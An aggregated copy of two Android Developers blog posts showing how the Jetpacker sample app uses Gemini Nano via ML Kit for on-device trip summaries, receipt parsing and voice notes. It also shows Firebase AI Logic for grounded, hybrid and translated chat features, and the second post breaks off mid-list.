<h2><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3FDrGSpGJqSapXXQ7052s1NR8rzvmmW-xbyOaAcg8bdTA6ZH7p6ZWE664FjlaoDLfREd-RlQil7gV-VjnCoq76o06haLoSxBzlIDAvM-dKvm_TCgPvqHU3ZlzBTXZ9XtAyMk26QWB8PvU5aUmzO0RBuMxqxJdC1wk7xl_1PXd1KHvuMCeHeAP9zhgSjg/s1848/Screenshot%202026-07-02%20at%2012.57.08%E2%80%AFPM.png"><img border="0" data-original-height="1256" data-original-width="1848" height="434" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3FDrGSpGJqSapXXQ7052s1NR8rzvmmW-xbyOaAcg8bdTA6ZH7p6ZWE664FjlaoDLfREd-RlQil7gV-VjnCoq76o06haLoSxBzlIDAvM-dKvm_TCgPvqHU3ZlzBTXZ9XtAyMk26QWB8PvU5aUmzO0RBuMxqxJdC1wk7xl_1PXd1KHvuMCeHeAP9zhgSjg/w640-h434/Screenshot%202026-07-02%20at%2012.57.08%E2%80%AFPM.png" width="640"></a></div><div><span><span><i>On-device features in Jetpacker: Summarizing trip itineraries, managing expenses, and voice notes</i></span></span></div><div class="separator"><br></div>High quality tailored summarization of short texts</h2>

<p>The itinerary screen gives users a quick overview of all activities for a given trip. Since this screen contains a lot of information, it can quickly become overwhelming. To help users prepare without feeling overwhelmed, we can add a ‘<b>Get ready for your trip</b>’ section at the top.</p>
<p><em></em></p>
<div class="separator"><em><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtWrJplvxl7ymB4kMN_Tg4tYYkL7G1Ory0hSptzqsbw_xCu4I9l_4SQPQ9CUXs_Jc7qtT1KcpltBds0aYgIvXiK_-qp6fnoX3QmYnGyqGgr2d5f2uzQkyMK-_Iebwp9Ap0aJA4c8Pz4Zy01O5AM6kk_qZ4Blx_bY-_2xIxSA8DMva2LWBbCN_Hb_c37KE/s2499/Screenshot_20260702_111934.png"><img border="0" data-original-height="2499" data-original-width="1183" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtWrJplvxl7ymB4kMN_Tg4tYYkL7G1Ory0hSptzqsbw_xCu4I9l_4SQPQ9CUXs_Jc7qtT1KcpltBds0aYgIvXiK_-qp6fnoX3QmYnGyqGgr2d5f2uzQkyMK-_Iebwp9Ap0aJA4c8Pz4Zy01O5AM6kk_qZ4Blx_bY-_2xIxSA8DMva2LWBbCN_Hb_c37KE/w189-h400/Screenshot_20260702_111934.png" width="189"></a></em></div>
<div><span><span><i>The romantic Paris trip is summarized as a classic Parisian adventure blending art, sights, and delicious food. A tip and some useful phrases are also added.</i></span></span></div>
<p></p>

<p>By inputting a trip itinerary and asking an LLM to summarize it, we can generate a quick summary of the trip along with packing tips and useful local phrases. This is a great use case for an on-device model for several reasons:</p>
<ul>
  <li><b>Performance and quality</b>: Both the input and output text are relatively short. With that, we can expect the performance and quality of an on-device solution to be on par with more powerful cloud models.</li>
  <li><b>Scalability</b>: Shifting inference on-device allows us to scale this feature from a few users to millions without worrying about managing increasing cloud inference costs.</li>
  <li><b>Low latency and reliability</b>: On-device inference guarantees low latency, providing a reliable experience even when users are offline.</li>
</ul>

<p>To build with on-device, we use <b>Gemini Nano</b>, Google’s most efficient model optimized for mobile devices. Gemini Nano was first introduced a few years ago, and is now running on over 140 million devices. The latest version of the model, <a href="https://android-developers.googleblog.com/2026/04/AI-Core-Developer-Preview.html">Gemini Nano 4, is built on the architecture foundation of the recently released Gemma 4 model</a>, and is further optimized for maximum battery and performance efficiency.</p>

<p>Using ML Kit’s <b>Prompt API</b>, we can take advantage of Gemini Nano 4’s new model capabilities to prototype our on-device features. We’ll create a prompt that includes the itinerary of a trip and ask the model to generate a summary along with any preparation tips.</p>

<pre><code>// implementation("com.google.mlkit:genai-prompt:1.0.0-beta3") 

// Define the configuration for Gemini Nano 4 E2B preview model
val previewFastConfig = generationConfig {
    modelConfig = modelConfig {
        releaseStage = ModelReleaseStage.PREVIEW
        preference = ModelPreference.FAST
    }
}

val geminiNano2BPreviewModel = Generation.getClient(previewFastConfig)

val tripItinerary = ...

val getReadyForYourTripSummary = geminiNano2BPreviewModel
 .generateContent("Given this trip itinerary: $tripItinerary, 
     generate the following: overall vibe, tips on how to prepare for this
     trip, and common short phrases to learn for the trip.")</code></pre>

<p>Finding the optimal prompt usually requires some iteration, and the AICore app is perfect for this step in the process. After opting into the <a href="https://developers.google.com/ml-kit/genai/aicore-dev-preview">developer preview option for AICore</a>, we can download preview models such as Gemini Nano 4 to test prompts and see the model’s expected outputs. With a few iterations on the prompt, we were able to improve the speed of the response from 13 seconds to under 2 seconds! Check out the final code implementation and prompt <a href="https://github.com/android/ai-samples/blob/40b999ef0e85693eac4de06e58335f0f5f125fa6/jetpacker/android/feature/trip/itinerary/enrichment/src/main/kotlin/com/example/jetpacker/feature/itinerary_enrichment/TripSummaryAndTipsProviderImpl.kt#L100" target="_blank">here</a>.</p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaY2Q7rzlrAj2i410lc3qqtKwI3m6ufAi27R5S94LVFJKEJPnxmvShIcAWdD_Cx9lhTz9tmKW_DVcmNg0rZFBKpqYj0M9niFJwa-AurlyV2SHuErI7Z9H59Q9S936I4ErUQ_NFRNSJpUBXwDVmw6vKNVpIkBrYPJNUpCIyNXl5Z17x7jEl5Kn9BGgFuLg/s553/Screen%20Recording%202026-07-02%20at%2012.28.51%E2%80%AFPM.gif"><img border="0" data-original-height="553" data-original-width="496" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaY2Q7rzlrAj2i410lc3qqtKwI3m6ufAi27R5S94LVFJKEJPnxmvShIcAWdD_Cx9lhTz9tmKW_DVcmNg0rZFBKpqYj0M9niFJwa-AurlyV2SHuErI7Z9H59Q9S936I4ErUQ_NFRNSJpUBXwDVmw6vKNVpIkBrYPJNUpCIyNXl5Z17x7jEl5Kn9BGgFuLg/w359-h400/Screen%20Recording%202026-07-02%20at%2012.28.51%E2%80%AFPM.gif" width="359"></a></div>

<div><span><span><i>The first iteration of our prompt generated way too many tokens, and optimizing it helped keep responses quick and to the point.</i></span></span></div>

<h2>Local processing for sensitive user input</h2>

<p>Next, to help users enjoy their trip even more, we’ll build a simple expense manager that takes the manual work out of sorting through receipts and calculating budgets.</p>
<div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsHCjYJhDefKk1_FHnyB8mXO6XGrVWPrWkkxUikHNrWly2YqLjD8GyN-qGXOBlZCJPug-VbVgBr8awg8I-TEl6d9udKhq_zKem9Xcdb7FzFlA4B77Iko2Rbf8R0XIPB30owcMoh-7KJ1paQnzDrNHSdvwYotNxt166QqJdNAf1d8wEwIFkL9qIEYUKmoQ/s1282/7.13_BlogGif_Transparent.gif"><img border="0" data-original-height="1282" data-original-width="613" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsHCjYJhDefKk1_FHnyB8mXO6XGrVWPrWkkxUikHNrWly2YqLjD8GyN-qGXOBlZCJPug-VbVgBr8awg8I-TEl6d9udKhq_zKem9Xcdb7FzFlA4B77Iko2Rbf8R0XIPB30owcMoh-7KJ1paQnzDrNHSdvwYotNxt166QqJdNAf1d8wEwIFkL9qIEYUKmoQ/w191-h400/7.13_BlogGif_Transparent.gif" width="191"></a></div>
<br>
  
<div><span><span><i>Taking a photo of a restaurant bill, data is parsed and shown in the expense overview screen of the app.</i></span></span></div>

<p>Since receipts might contain sensitive information like credit card number and addresses, this is another great use case for an on-device solution. With on-device, users can be confident that private information will be processed locally on the device without any of their data being sent to the cloud.</p>

<p>In addition, Gemini Nano 4 has improved model capabilities for multimodality, especially for image understanding tasks like OCR and visual data extraction, making it a great solution for tasks like extracting information from receipts.</p>

<p>For this use case, the prompt will analyze an image of the receipt, and output information such as: a generated title, amount spent and category of the expense. To ensure the model outputs the information in the preferred format, we can use <a href="https://developers.google.com/ml-kit/genai/prompt/android/structured-output">ML Kit’s Structured Output API</a> to seamlessly output a Kotlin data object that we define.</p>

<pre><code>// implementation("com.google.mlkit:genai-prompt:1.0.0-beta3")
// ksp("com.google.mlkit:genai-schema-compiler:1.0.0-alpha1")

@Generable("Information extracted from an expense receipt")
data class ParsedReceipt(
  @Guide("Generated title for the expense less than 6 words. Based on restaurant or activity name.")
  val title: String,
  @Guide("Total amount of the expense. Look for values at the bottom and words like total or balance due.")
  val amount: Double,
  @Guide("Type of expense", enumValues = ["travel", "food", "shopping", "entertainment", "other"])
  val category: String,
)

val prompt = "Determine if the image is a receipt or expense. 
    If it is NOT a receipt or expense, output the text 'NOT_A_RECEIPT'.
    Otherwise, parse the receipt information."

val request = generateContentRequest(ImagePart(bitmap), TextPart(prompt)) {}
val requestWithStructuredOutput = generateTypedContentRequest(request, ParsedReceipt::class)

// Define the configuration for Gemini Nano 4 E4B preview model  
// When selecting models, you can specify which performance charactertists are most important
//  for your use case. Use ModelPreference.FULL when you want to prioritize reasoning power over speed. 
//  Use ModelPreference.FAST when complex logic is not required and latency is a priority.
val previewFullConfig = generationConfig {
    modelConfig = modelConfig {
        releaseStage = ModelReleaseStage.PREVIEW
        preference = ModelPreference.FULL
    }
}

val geminiNano4BPreviewModel = Generation.getClient(previewFullConfig)
val response = geminiNano4BPreviewModel.generateContent(requestWithStructuredOutput)
val parsedReceipt: ParsedReceipt? = response.candidates.firstOrNull()?.response</code></pre>

<h2>Multimodal input</h2>

<p>Lastly, to help users record audio memos during the trip, let’s build a fully on-device voice notes feature. Using <a href="https://developers.google.com/ml-kit/genai/speech-recognition/android">ML Kit’s Speech Recognition API</a>, we’ll enable users to record short voice notes that are automatically transcribed to text. With the transcribed text, we’ll use ML Kit’s Prompt API to identify which trip activity is associated with the recorded voice note, letting users easily recap their trip as they scroll through the trip’s itinerary.</p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnAm4XPVEJkfPmRFKJWh2sS-4rVz_eFollYxU5DWb7kAkSQdP4xhAEosziS_vpxv6yoAkvHiSp6SGYOp2_qp_cJWgfbJGnDOadaMP6Bc30a6rYnSP34sEubNAWXqsmd3cpYOoL8rCUhQn0_4GT3165aSFinlnHZjVnXYNYBAw8AdVtJpuRG2gDbi-uRII/s2499/Screenshot_20260702_115529.png"><img border="0" data-original-height="2499" data-original-width="1183" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnAm4XPVEJkfPmRFKJWh2sS-4rVz_eFollYxU5DWb7kAkSQdP4xhAEosziS_vpxv6yoAkvHiSp6SGYOp2_qp_cJWgfbJGnDOadaMP6Bc30a6rYnSP34sEubNAWXqsmd3cpYOoL8rCUhQn0_4GT3165aSFinlnHZjVnXYNYBAw8AdVtJpuRG2gDbi-uRII/w189-h400/Screenshot_20260702_115529.png" width="189"></a></div>

<p><em>The Roman holiday itinerary shows voice note extracts.</em></p>

<p>The <a href="https://developers.google.com/ml-kit/genai/speech-recognition/android">ML Kit GenAI Speech Recognition API </a>allows you to transcribe audio content to text fully on-device using two distinct modes. <b>Basic mode</b> uses a traditional on-device speech recognition model and is available on most Android devices with API level 31 and higher. <b>Advanced mode</b> uses Gemini Nano to offer broader language coverage and better quality, and is currently supported on Pixel 10 devices.</p>

<p>For our feature we combine the Speech Recognition API with the ML Kit GenAI Prompt API:</p>

<pre><code>// implementation("com.google.mlkit:genai-prompt:1.0.0-beta3")
// implementation("com.google.mlkit:genai-speech-recognition:1.0.0-alpha1")

val tripEvents = ... 

// Set up speech recognition
val speechRecognizerOptions =
    speechRecognizerOptions {
        locale = Locale.US
        preferredMode = SpeechRecognizerOptions.Mode.MODE_ADVANCED
    }
val speechRecognizer: SpeechRecognizer = SpeechRecognition.getClient(speechRecognizerOptions)

suspend fun transcribeVoiceNote(recognizer: SpeechRecognizer) {
    // Display partial text as the user is recording audio
    var partialTextResponse = ""

    // Display the full text once user is finished recording audio
    var transcription = ""

    val request: SpeechRecognizerRequest
        = speechRecognizerRequest { audioSource = AudioSource.fromMic() }
    recognizer.startRecognition(request).collect { response -&gt;
        when (response) {
            is SpeechRecognizerResponse.PartialTextResponse -&gt; {
                partialTextResponse = response.text
            }
            is SpeechRecognizerResponse.FinalTextResponse -&gt; {
                transcription = response.text
                processAndCategorizeVoiceNote(transcription, tripEvents)
            }
        }
    }
}

fun processAndCategorizeVoiceNote(transcribedVoiceNote: String, events: List<event>) {
    val prompt = "Given the voice note $transcribedVoiceNote
     and the following events for this trip: $events, rewrite this transcription
     to remove filler words. Then, identify which events from the
     list this rewritten transcription matches to."

     // Utilize ML Kit's Prompt API to process voice note and tag it with the relevant trip activities
     Generation.getClient().generateContent(prompt)
}</event></code></pre>

<h2>Conclusion</h2>

<p>Using ML Kit’s GenAI APIs, we were able to take advantage of Gemini Nano to develop fully on-device intelligent features for the JetPacker app, and provide an improved user experience without any additional cloud costs.</p>

<p>Check out the full source code for <a href="https://github.com/android/ai-samples/tree/main/jetpacker" target="_blank">Jetpacker on Github</a>, and watch the video <a href="https://www.youtube.com/watch?v=_iuXykdlTkk">Build Intelligent Android apps with Google’s AI</a> to learn more about how to integrate intelligent features directly into your app using on-device models, cloud-powered reasoning, and the latest agentic frameworks.</p><h2>Learn more</h2>

<p>Check out the other parts of this blog post series:</p><a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-introduction-jetpack.html"><b>Part 1:</b></a> Introduction of the app and a high-level overview.<br><a href="http://android-developers.googleblog.com/2026/07/android-on-device-inference.html"><b>Part 2 (this post!):</b></a> On-device intelligence. Deep-dive into ML Kit’s GenAI APIs and Gemini Nano to build privacy-first features like itinerary summarization, receipt parsing, and local audio processing.<br><a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-cloud-hybrid-inference.html"><b>Part 3:</b> </a>Hybrid and cloud reasoning. Explore how to use Firebase AI Logic to ground LLM answers in real-world data like Google Maps and web context.<br><a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-appfunctions.html"><b>Part 4:</b></a> System integration. Integrating with the Android intelligence system using AppFunctions.<br>Part 5 (coming soon): In-app agentic workflows. Extend the app with an end-to-end booking assistant powered by A2UI and ADK.

<p>Interested in more on Android Development? Follow Android Developers on <a href="https://www.youtube.com/@AndroidDevelopers">YouTube</a> or <a href="https://www.linkedin.com/showcase/androiddev/">LinkedIn</a>!</p>

<p>All code snippets in this blog post follow the following copyright notice:<br>
</p><pre><code>Copyright 2026 Google LLC.
SPDX-License-Identifier: Apache-2.0</code></pre><p></p></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Build intelligent Android apps: Cloud and hybrid inference]]></title>
<description><![CDATA[Posted by Thomas Ezan, Jolanda Verhoef, Caren Chang, Senior Developer Relations Engineers, Android Developer RelationsWelcome back to the blog post series "Build intelligent Android apps" where we take a basic Android app and transform it into a personalized, intelligent, and agentic experience. ...]]></description>
<link>https://tsecurity.de/de/3693496/android-tipps/build-intelligent-android-apps-cloud-and-hybrid-inference/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693496/android-tipps/build-intelligent-android-apps-cloud-and-hybrid-inference/</guid>
<pubDate>Sat, 25 Jul 2026 10:15:23 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBHTpa22SxEltoebLZYO_34iRtahN8z5tA3tnIryIii0s4_conN5qFYfmNro6nmZBfsgiZeRLtru-gE4XO2mf-RBDyIo00kf3QunWwUO-SICHkVSv0exAQQ4qA0KzjMGRpA8qj1TSMP0Ffe0FzrEc_S1zBaakKzCZFpqYLXqds9Zqmqr8yyeSgyNl9U0s/s2469/features%20in%20Jetpacker%20Features%20with%20Firebase%20AI%20Logic%20_Meta.png"><div><i>Posted by Thomas Ezan, Jolanda Verhoef, Caren Chang, Senior Developer Relations Engineers, Android Developer Relations</i></div><div><br></div><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn2fO3T2xckksQ9pk3RUNPxZqqq2CyaifXnju0lCCpbfwJ4gZyq-df0kM_mK1TMV0F9YCMo19Ba9NvFAiUpzDH6Wlk_RyonRCK5Ono25CYyQ7xGC3q70mUhyphenhyphenOOYJ-5JX2KlFP1lIA3ULIhH86_hP2ptO0AllUIf6ZVh-SqoXVWcXrM8m3hHCkhGwZYfP4/s8583/AFD%20-%20%5BABL_101%5D%20Building%20AI%20features%20in%20Jetpacker%20Features%20with%20Firebase%20AI%20Logic%20_Blog.png"><img border="0" data-original-height="2601" data-original-width="8583" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn2fO3T2xckksQ9pk3RUNPxZqqq2CyaifXnju0lCCpbfwJ4gZyq-df0kM_mK1TMV0F9YCMo19Ba9NvFAiUpzDH6Wlk_RyonRCK5Ono25CYyQ7xGC3q70mUhyphenhyphenOOYJ-5JX2KlFP1lIA3ULIhH86_hP2ptO0AllUIf6ZVh-SqoXVWcXrM8m3hHCkhGwZYfP4/s1600/AFD%20-%20%5BABL_101%5D%20Building%20AI%20features%20in%20Jetpacker%20Features%20with%20Firebase%20AI%20Logic%20_Blog.png"></a></div><br><p><br></p><p>Welcome back to the blog post series "<a href="http://android-developers.googleblog.com/2026/07/build-intelligent-android-apps-introduction-jetpack.html" target="_blank">Build intelligent Android apps</a>" where we take a basic Android app and transform it into a <b>personalized</b>, <b>intelligent</b>, and <b>agentic</b> experience. In our <a href="http://android-developers.googleblog.com/2026/07/android-on-device-inference.html">previous post</a> we explored how to build intelligent on-device features using Gemini Nano through ML Kit's Prompt API.</p>

<p>In this post, we will look at how you can leverage <b><a href="https://firebase.google.com/docs/ai-logic">Firebase AI Logic</a> </b>to build cloud-hosted and hybrid AI features: </p>
<ul>
  <li>Grounding answers in real-world context</li>
  <li>Routing requests dynamically between cloud and local execution using hybrid inference</li>
  <li>Translating content with custom routing systems</li>
</ul>

<div>
  
  
</div><p><br></p><p>Sometimes a use case requires AI models with greater world knowledge, a much larger context window, or the ability to handle complex queries. In those scenarios, we can leverage cloud models. </p>

<p>Other times, you want the best of both worlds: using hybrid inference to run on-device when available to lower costs, while falling back to the cloud to ensure compatibility for all devices.</p><br><div class="separator"><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwlTUF1Kzkbrf2w64KO3jZJZZ_wLEu34vq6Cb7PX2alVUhFVdbkiWuXCkzUS-bPJkHMbmuNJ_Ov0HYZzujr69jCU9gPvmKaKMZt2q4-TolSDFCLABBIY1IBRY9Zn7D5S10hFcJD2kuVCm3N2glpqDJoHiqAZat4z6oyXxxwH4ZCGVBgfPObMevoJrgNPg/s8000/features_upscaled.png"><img border="0" data-original-height="4744" data-original-width="8000" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwlTUF1Kzkbrf2w64KO3jZJZZ_wLEu34vq6Cb7PX2alVUhFVdbkiWuXCkzUS-bPJkHMbmuNJ_Ov0HYZzujr69jCU9gPvmKaKMZt2q4-TolSDFCLABBIY1IBRY9Zn7D5S10hFcJD2kuVCm3N2glpqDJoHiqAZat4z6oyXxxwH4ZCGVBgfPObMevoJrgNPg/s1600/features_upscaled.png"></a></div><em>Cloud and hybrid features in Jetpacker: Museum assistant with web grounding, hybrid restaurant review drafting, and 
  support chat featuring custom-routed live translation.</em></div>

<p>Let’s look at how we implemented three cloud and hybrid features in <a href="https://github.com/android/ai-samples/tree/main/jetpacker" target="_blank">Jetpacker</a>:</p>
<ul>
  <li>a museum assistant with web grounding</li>
  <li>hybrid restaurant review drafting</li>
  <li>hotel support chat featuring custom-routed live translation.</li>
</ul>

<h2>Use LLM grounding for up-to-date informationMuseum assistant chatbot with LLM grounding</h2>
<p>The <b>Museum assistant </b>is an interactive chatbot designed to help users plan their museum visits. It provides visitors with up-to-date details regarding specific exhibits, current opening hours, ticket pricing, and more.</p><br><div class="separator"><em><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3pxeCVJfOo5G7McNB4RCIhoCUch8CHSAWI7gHijJJcE95b0gbu3lyAO1xIWc6mKllkpylSPBnVfU6RYnwfay4z6dH7TlufPuNw3Lw7s-bEuR4Ajx8IHK8k6zJcOHitqMRdDv8EVL-fCN6uuDo1QTnOgk_RW-AEM1_hZaJWbCGezMQF_D9Hia-Rm2T4-c/s4880/museum_assistant_upscaled.png"><img border="0" data-original-height="4880" data-original-width="2392" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3pxeCVJfOo5G7McNB4RCIhoCUch8CHSAWI7gHijJJcE95b0gbu3lyAO1xIWc6mKllkpylSPBnVfU6RYnwfay4z6dH7TlufPuNw3Lw7s-bEuR4Ajx8IHK8k6zJcOHitqMRdDv8EVL-fCN6uuDo1QTnOgk_RW-AEM1_hZaJWbCGezMQF_D9Hia-Rm2T4-c/w314-h640/museum_assistant_upscaled.png" width="314"></a></div>Museum assistant is a chatbot that answers questions, such as </em></div><div class="separator"><em>‘How can I get a ticket discount for Le Louvre?’</em></div>

<p>When building AI features, getting the model to answer with fresh, accurate, and specific real-world information is a common challenge. While cloud models possess massive amounts of world knowledge, they might not know about seasonal exhibits or the current day’s opening hours. </p><div class="separator"><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8He5M2JC5EwXZwa-M52UAXHSO4dWy4gx3aZoY2ZXM-x25pV4kc6BsICe_fG4Zn6-R37_UgTQ8LBSsrNcP50e3aQLgxNbHOfWLBqzaSqQ78ZDmNEJadZNc-I5bduHr0UtWOxYMTFAHgffxcuzaETHPe3lvfRod2rkeOUXnRaLJ_vIiAfO_xRKpESbX3L8/s8000/grounding_upscaled.png"><img border="0" data-original-height="4452" data-original-width="8000" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8He5M2JC5EwXZwa-M52UAXHSO4dWy4gx3aZoY2ZXM-x25pV4kc6BsICe_fG4Zn6-R37_UgTQ8LBSsrNcP50e3aQLgxNbHOfWLBqzaSqQ78ZDmNEJadZNc-I5bduHr0UtWOxYMTFAHgffxcuzaETHPe3lvfRod2rkeOUXnRaLJ_vIiAfO_xRKpESbX3L8/s1600/grounding_upscaled.png"></a></div><br><em><br>Grounding data is added to the context window to enable the model</em></div><div class="separator"><em> to answer questions correctly and accurately.</em></div>

<p>To bridge this gap, we can use grounding techniques to add extra context to the model’s context window. The <a href="https://firebase.google.com/products/firebase-ai-logic" target="_blank">Firebase AI Logic SDK</a> supports three types of grounding:</p>
<ul>
  <li><strong><a href="https://firebase.google.com/docs/ai-logic/url-context">URL grounding</a>:</strong> Grounding responses using content from a specific webpage (e.g. current ticket prices or museum rules).</li>
  <li><strong><a href="https://firebase.google.com/docs/ai-logic/grounding-google-search">Google Search grounding</a>:</strong> Letting the model query the real-time Google search index for up-to-date details.</li>
  <li><strong><a href="https://firebase.google.com/docs/ai-logic/grounding-google-maps">Maps grounding</a>:</strong> Using Google Maps location data.</li>
</ul>

<p>In Jetpacker, we dynamically construct the available tools based on enabled feature flags and initialize the generative model using the Firebase AI SDK:</p>

<pre><code>// implementation("com.google.firebase:firebase-ai-logic")

private var toolList = mutableListOf&lt;Tool&gt;()

init {
    if (ENABLE_SEARCH_GROUNDING) {
        toolList.add(Tool.googleSearch())
    }
    if (ENABLE_URL_GROUNDING) {
        toolList.add(Tool.urlContext())
    }
}

private val generativeModel = Firebase.ai(backend = GenerativeBackend.googleAI())
    .generativeModel(
        modelName = "gemini-3-flash",
        systemInstruction = content {
            text("You are a helpful museum assistant answering questions about a museum. Use plain text.")
        },
        tools = toolList
    )</code></pre>

<p>When the user queries the assistant, if URL grounding is enabled, we append the specific museum resource URLs directly into the prompt:</p>

<pre><code>val groundingText = if (FeatureFlags.ENABLE_URL_GROUNDING) {
    "\n If the following message above is about the rules and terms to visit Le Louvre, " +
    "if needed answer this urls ${urlList.joinToString()}"
} else {
    ""
}

val prompt = "$text $groundingText"

var response = chat.sendMessage(prompt)
</code></pre>

<h2>Hybrid inference: On-device review generation with Maps deep link</h2>
<p>Not every AI task requires a cloud-based model, and not every device is online. To help developers balance latency, cost, and offline availability, we recently introduced the <a href="https://firebase.google.com/docs/ai-logic/hybrid/android/get-started?api=dev">Firebase API for Hybrid Inference</a>.</p>

<p>In Jetpacker, the <b>restaurant review</b> feature lets users review select topics and automatically drafts a review. To enable this for all users, we prioritize local execution with Gemini Nano, and fall back to cloud models on devices that don’t support Gemini Nano. </p><div class="separator"><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVa1o2Zh3v3Babi7gGmzOFYAKPEgS0HWmvisiKgK-QsSRh_ZhjTjuUYSS_QIH0JQw9NsqrkYe4Quud6cfCGwVc61_7HKcACj6c9yywWySn5xyHGgemBR5tYPP8q3bmLadaN6uLXspE9LqrcZkVdckEGHWDhdfYVa-xo8QomDaRn03mau2fHVyK0Fr1FaU/s4680/review_upscaled.png"><img border="0" data-original-height="4680" data-original-width="2392" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVa1o2Zh3v3Babi7gGmzOFYAKPEgS0HWmvisiKgK-QsSRh_ZhjTjuUYSS_QIH0JQw9NsqrkYe4Quud6cfCGwVc61_7HKcACj6c9yywWySn5xyHGgemBR5tYPP8q3bmLadaN6uLXspE9LqrcZkVdckEGHWDhdfYVa-xo8QomDaRn03mau2fHVyK0Fr1FaU/w327-h640/review_upscaled.png" width="327"></a></div><br></div><div class="separator"><em>The restaurant review feature uses hybrid inference to draft a review based on topics</em></div><div class="separator"><em><br></em></div>

<pre><code>// implementation("com.google.firebase:firebase-ai-logic")
// implementation("com.google.firebase:firebase-ai-ondevice:16.0.0-beta03")


// Initialize the model with hybrid routing configuration
val reviewModel = Firebase.ai.generativeModel(
    modelName = "gemini-3.1-flash-lite",
    onDeviceConfig = OnDeviceConfig(
        inferenceMode = InferenceMode.PREFER_ON_DEVICE
    )
)</code></pre>

<p>The Hybrid Inference API supports four distinct routing modes:</p>
<ul>
  <li><strong>PREFER_ON_DEVICE:</strong> Prioritizes local execution and falls back to cloud if Gemini Nano is unavailable.</li>
  <li><strong>PREFER_IN_CLOUD:</strong> Prioritizes cloud execution and falls back to on-device if the device goes offline.</li>
  <li><strong>ONLY_ON_DEVICE:</strong> Restricts execution strictly to the device.</li>
  <li><strong>ONLY_IN_CLOUD:</strong> Restricts execution strictly to the cloud.</li>
</ul>

<p>Once the review is generated, we copy it to the clipboard and use an intent to open Google Maps directly to the restaurant's review page, providing a seamless user experience:</p>

<pre><code>private fun copyAndOpenMapsReview(context: Context, reviewText: String, placeId: String) {
    val clipboard = context.getSystemService(Context.CLIPBOARD_SERVICE) as ClipboardManager
    val clip = ClipData.newPlainText("User Review", reviewText)
    clipboard.setPrimaryClip(clip)

    val uri = Uri.parse("https://search.google.com/local/writereview/mobile?placeid=$placeId")
    val intent = Intent(Intent.ACTION_VIEW, uri).apply {
        setPackage("com.google.android.apps.maps")
    }
    context.startActivity(intent)
}</code></pre>

<h2>Custom hybrid routing: Hotel support chat translation with simulated personas</h2>
<p>The <b>hotel support chat</b> was built to let users finalize logistics and check on hotel details. This feature uses system instructions to configure a localized receptionist assistant. By passing specific information—such as the preferred language and hotel information—in the instructions, we can set up a conversational persona representing a specific hotel.</p>

<pre><code>private val generativeModel = Firebase.ai(backend = GenerativeBackend.googleAI())
    .generativeModel(
        systemInstruction = content {
            text("""
              You are a helpful hotel receptionist at $hotelName only speaking $language. 
              Answer politely in $language. The bar closes at 10pm and breakfast is from 7am to 10am.
              There's someone at the desk 24/7. You can retrieve your luggage from the storage room 
              at the back of the lobby at any time.
              """)
        },
        modelName = "gemini-3-flash-preview"
    )</code></pre>

<p>Because receptionist responses are in the hotel's local language (for example, French for Hotel Le Meurice in Paris), we need to translate messages to the user’s preferred language. </p><div class="separator"><em><br><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikIB_NnUYK8GnEpI3foNLO2_AQ2lNZhoc9gFB-CjERDjMwrdQ2T45y6jzrJAafi4Jz7eF_SBkXG7csDwpajKctp5yo1hsBjIacIfK3aHvvQjCUu22qZBj7dLl5Q4aGFJRD4hwTlMMNgZD8sIuYpCrRjMmpa5ybXDzi9nkTMZoiJOEn8jLmqBsgTXcVTDY/s4112/translation_upscaled.png"><img border="0" data-original-height="2364" data-original-width="4112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikIB_NnUYK8GnEpI3foNLO2_AQ2lNZhoc9gFB-CjERDjMwrdQ2T45y6jzrJAafi4Jz7eF_SBkXG7csDwpajKctp5yo1hsBjIacIfK3aHvvQjCUu22qZBj7dLl5Q4aGFJRD4hwTlMMNgZD8sIuYpCrRjMmpa5ybXDzi9nkTMZoiJOEn8jLmqBsgTXcVTDY/s1600/translation_upscaled.png"></a></div><div class="separator"><em>Hotel support chat messages are automatically translated to the user’s preferred language </em></div></em></div>

<p>While hybrid models can configure simple routing preferences, complex scenarios require custom routing logic. In Jetpacker, we implement a custom routing stack that takes into account:</p>
<ul>
  <li><strong>Language identification:</strong> Using the on-device <a href="https://developers.google.com/ml-kit/language/identification/android">ML Kit Language Identification API</a>, we can detect the incoming message language.</li>
  <li><strong>On-device translation (Gemini Nano):</strong> <a href="https://developers.google.com/ml-kit/genai/prompt/android">ML Kit’s Prompt API</a> lets us translate common language pairs directly on the device, saving bandwidth and cloud cost.</li>
